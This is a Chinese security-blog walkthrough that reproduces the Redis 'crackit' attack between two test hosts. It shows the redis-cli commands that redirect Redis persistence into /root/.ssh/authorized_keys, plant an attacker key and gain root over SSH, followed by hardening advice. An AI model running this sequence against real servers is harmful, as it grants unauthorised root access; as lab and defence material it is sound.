神刀安全网

[原]redis crackit 漏洞 过程还原

**

redis crackit 漏洞 过程还原

**1.在两台测试机器上分别安装reids,一台作为发起攻击的机器(可以使用本地redis-cli登录远程redis-server),一台作为被攻击的机器(运行有redis-server)。

 [root@test-hadoop-s1 ~]# yum install redis -y  [root@test-hadoop-s2 ~]# yum install redis -y

2.修改test-hadoop-s1上的redis配置文件使redis允许从任何ip地址连接(如果仅允许本地连接那么从远程发起的攻击也就无从谈起了),另外使redis无需密码便可登录(这也是使攻击者能够得逞的条件之一,若设置的有密码且密码强度相当高则攻击便能有效避免)

[root@test-hadoop-s1 ~]# vim /etc/redis.conf  bind 0.0.0.0

注释如下内容(默认就是注释的)

# requirepass foobared

3.以root用户启动redis,若果是用/etc/init.d/redis start或者service redis start方式启动则是以redis用户(nologin用户)启动的,此时不具备/root/.ssh的目录权限,无法对其中的内容进行操作。后续的破坏行为也没办法得逞。

[root@test-hadoop-s1 ~]# sudo redis-server /etc/redis.conf

4.因为test-hadoop-s1、test-hadoop-s2均没有设置防火墙故从test-hadoop-s2可以连接至test-hadoop-s1上的redis-server。如果设置有相应的防火墙,只允许特定的主机进行连接,那么攻击行为也是可以有效避免的。

 [root@test-hadoop-s1 ~]# iptables -L -nv Chain INPUT (policy ACCEPT 32M packets, 26G bytes)  pkts bytes target     prot opt in     out     source               destination           Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)  pkts bytes target     prot opt in     out     source               destination           Chain OUTPUT (policy ACCEPT 34M packets, 25G bytes)  pkts bytes target     prot opt in     out     source               destination     [root@test-hadoop-s2 ~]# iptables -L -nv Chain INPUT (policy ACCEPT 86M packets, 61G bytes)  pkts bytes target     prot opt in     out     source               destination           Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)  pkts bytes target     prot opt in     out     source               destination           Chain OUTPUT (policy ACCEPT 84M packets, 71G bytes)  pkts bytes target     prot opt in     out     source               destination

5.测试从test-hadoop-s2 连test-hadoop-s1上的redis是可通的

[root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379 redis test-hadoop-s1:6379>

也可以如下测试是否可以远程连通

[root@test-hadoop-s2 ~]# telnet test-hadoop-s1 6379 Trying 10.104.154.155... Connected to test-hadoop-s1. Escape character is '^]'. echo "hello" $7 "hello" quit +OK Connection closed by foreign host.

6.在test-hadoop-s2 生成公/私秘钥对,分别保存在/root/.ssh/id_rsa.pub和/root/.ssh/id_rsa中。

[root@test-hadoop-s2 ~]# ssh-keygen -C "redis_crack@redis.io" Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa):  /root/.ssh/id_rsa already exists. Overwrite (y/n)? y Enter passphrase (empty for no passphrase):  Enter same passphrase again:  Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: 3e:69:20:d1:bb:ee:dc:cc:30:7b:da:6e:90:e0:35:0b redis_crack@redis.io The key's randomart image is: +--[ RSA 2048]----+ |                 | |     .           | |    . .          | |    E.o.         | |   ..+o+S        | |    ..++ .       | |      +.=        | |     o Xo.       | |     .*=*        | +-----------------+

7.因为纯属测试,所以先备份一下test-hadoop-s1上原有的authorized_keys文件以便于测试完成后恢复

[root@test-hadoop-s1 ~]# cd .ssh/ [root@test-hadoop-s1 .ssh]# ll total 16 -rw-r--r-- 1 root root 2003 Mar  2 16:25 authorized_keys -rw------- 1 root root 1675 Mar  2 16:20 id_rsa -rw-r--r-- 1 root root  401 Mar  2 16:20 id_rsa.pub -rw-r--r-- 1 root root 2403 Apr  6 13:13 known_hosts [root@test-hadoop-s1 .ssh]# mv authorized_keys authorized_keys_bak

8.通过test-hadoop-s2重新在命令行中配置redis的持久化目录和备份文件名,使备份目录为保存公/私钥的目录/root/.ssh,备份文件名为authorized_keys

[root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379 redis test-hadoop-s1:6379> config set dir /root/.ssh OK redis test-hadoop-s1:6379> config set dbfilename "authorized_keys" OK

9.在test-hadoop-s2连接test-hadoop-s1上的redis,清空所有db并将test-hadoop-s2生成的公钥写进crackit这个key并持久保存在备份文件中

[root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379 flushall OK [root@test-hadoop-s2 ~]# (echo -e '/n';cat /root/.ssh/id_rsa.pub;echo -e '/n') | redis-cli -h test-hadoop-s1 -p 6379  -x set crackit OK [root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379 save OK

这样一来test-hadoop-s2的公钥便被写进了test-hadoop-s1的/root/.ssh/authorized_keys文件中,可以在test-hadoop-s2无密码登录test-hadoop-s1了

10.测试连接,通过ssh命令利用私钥进行登录

[root@test-hadoop-s2 ~]# ssh -i /root/.ssh/id_rsa root@test-hadoop-s1 Last login: Tue Apr 19 16:17:38 2016 from 10.104.142.115 [root@test-hadoop-s1 ~]# 

好了,现在可以通过root用户为所欲为了!!!

从还原漏洞的过程就可以了解到该如何避免被攻击了。可以从以下下几个方面防御:

  • 用redis用户启动redis服务,避免使用root用户启动
  • 为redis配置强度较高的密码,不要使用空密码、弱密码或者默认密码
  • 限定redis只能从特定主机访问,如127.0.0.1,而非允许所有主机0.0.0.0
  • 修改默认6379端口
  • 禁用特殊的命令,如flushall、config等
  • 为redis服务所在的主机配置一道坚实的防火墙

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » [原]redis crackit 漏洞 过程还原

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址